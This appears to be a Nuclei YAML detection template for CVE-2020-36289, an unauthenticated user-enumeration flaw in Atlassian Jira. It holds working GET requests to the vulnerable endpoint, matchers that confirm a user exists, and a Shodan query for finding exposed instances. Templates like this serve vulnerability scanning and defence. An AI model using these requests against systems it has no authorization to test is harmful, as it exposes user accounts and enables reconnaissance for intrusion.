43 lines
1.4 KiB
YAML
43 lines
1.4 KiB
YAML
id: CVE-2020-36289
|
|
|
|
info:
|
|
name: Atlassian Jira Unauth User Enumeration
|
|
author: dhiyaneshDk
|
|
severity: medium
|
|
description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
|
|
reference:
|
|
- https://twitter.com/ptswarm/status/1402644004781633540
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-36289
|
|
- https://jira.atlassian.com/browse/JRASERVER-71559
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2020-36289
|
|
cwe-id: CWE-200
|
|
metadata:
|
|
shodan-query: http.component:"Atlassian Jira"
|
|
tags: cve,cve2020,jira,atlassian,unauth
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
|
|
- '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
|
|
|
|
stop-at-first-match: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'rel=\"admin\"'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/json'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|